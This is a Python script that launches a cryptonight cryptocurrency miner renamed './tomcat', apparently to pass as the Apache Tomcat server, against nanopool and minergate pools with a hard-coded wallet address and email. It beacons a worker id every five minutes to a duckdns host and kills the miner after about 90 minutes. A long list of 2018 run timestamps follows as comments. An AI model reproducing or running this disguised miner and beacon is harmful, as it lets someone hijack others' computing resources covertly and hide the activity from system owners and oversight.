import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:05.727331
#2018-02-17 16:24:01.918983
#2018-02-17 18:12:07.168406
#2018-02-17 20:00:01.539939
#2018-02-17 21:48:01.759106
#2018-02-17 23:33:05.900936
#2018-02-18 01:23:05.093327
#2018-02-18 03:10:05.568555
#2018-02-18 04:57:04.454180
#2018-02-18 06:48:05.170430
#2018-02-18 08:39:04.951365
#2018-02-18 10:25:07.944833
#2018-02-18 12:11:06.757606
#2018-02-18 13:57:05.781173
#2018-02-18 15:47:01.856785
#2018-02-18 17:38:05.047397
#2018-02-18 19:26:07.303826
#2018-02-18 21:12:07.164073
#2018-02-18 22:59:02.399123
#2018-02-19 00:47:05.489560
#2018-02-19 02:34:04.354765
#2018-02-19 04:20:08.290765
#2018-02-19 06:05:01.552680
#2018-02-19 07:53:01.673138
#2018-02-19 09:43:03.745162
#2018-02-19 11:32:10.271352
#2018-02-19 13:19:08.490984
#2018-02-19 15:06:06.328995
#2018-02-19 16:54:01.672091
#2018-02-19 18:41:04.230385
#2018-02-19 20:28:05.857235
#2018-02-19 22:16:06.096657
#2018-02-20 00:01:04.450754
#2018-02-20 01:49:03.875576
#2018-02-20 03:39:06.849172
#2018-02-20 05:25:04.036829
#2018-02-20 07:08:07.369408
#2018-02-20 08:54:04.489418
#2018-02-20 10:37:07.532360
#2018-02-20 12:23:04.232739
#2018-02-20 14:10:07.539253
#2018-02-20 15:55:10.571414
#2018-02-20 17:41:10.545969
#2018-02-20 19:31:04.363306
#2018-02-20 21:20:04.191738
#2018-02-20 23:06:06.104278
#2018-02-21 00:52:01.288600
#2018-02-21 02:39:05.452054
#2018-02-21 04:28:06.968748
#2018-02-21 06:17:06.396038
#2018-02-21 08:03:03.770890
#2018-02-21 09:48:04.552199
#2018-02-21 11:37:08.991558
#2018-02-21 13:26:04.236596
#2018-02-21 15:12:09.499029
#2018-02-21 17:03:04.898026
#2018-02-21 18:51:01.900570
#2018-02-21 20:38:01.919542
#2018-02-21 22:25:08.263620
#2018-02-22 00:15:03.369571
#2018-02-22 02:03:07.878571
#2018-02-22 03:49:01.712807
#2018-02-22 05:36:01.391557
#2018-02-22 07:21:05.814589
#2018-02-22 09:08:06.083607
#2018-02-22 10:56:04.067840
#2018-02-22 12:41:03.886999
#2018-02-22 14:29:03.114404
#2018-02-22 16:17:13.538690
#2018-02-22 18:04:12.185007
#2018-02-22 19:54:08.095204
#2018-02-22 21:44:06.651067
#2018-02-22 23:32:04.325180
#2018-02-23 01:21:06.029808
#2018-02-23 03:07:05.628137
#2018-02-23 04:55:05.806439
#2018-02-23 06:41:06.761555
#2018-02-23 08:31:05.608505
#2018-02-23 10:45:06.923558
#2018-02-23 12:42:08.422891
#2018-02-23 14:26:09.059886
#2018-02-23 16:18:08.746208
#2018-02-23 18:05:08.320809
#2018-02-23 19:51:07.315205
#2018-02-23 21:34:05.609024
#2018-02-23 23:22:02.111174
#2018-02-24 01:16:04.883580
#2018-02-24 03:08:02.119141
#2018-02-24 04:53:06.755017
#2018-02-24 06:39:01.764219
#2018-02-24 08:27:04.461094
#2018-02-24 10:13:04.010914
#2018-02-24 12:07:05.120833
#2018-02-24 13:56:04.264078
#2018-02-24 15:47:04.163960
#2018-02-24 17:39:01.541388
#2018-02-24 19:24:07.334136
#2018-02-24 21:15:04.203288
#2018-02-24 23:51:04.252377
#2018-02-25 03:09:05.244902
#2018-02-25 06:54:03.067653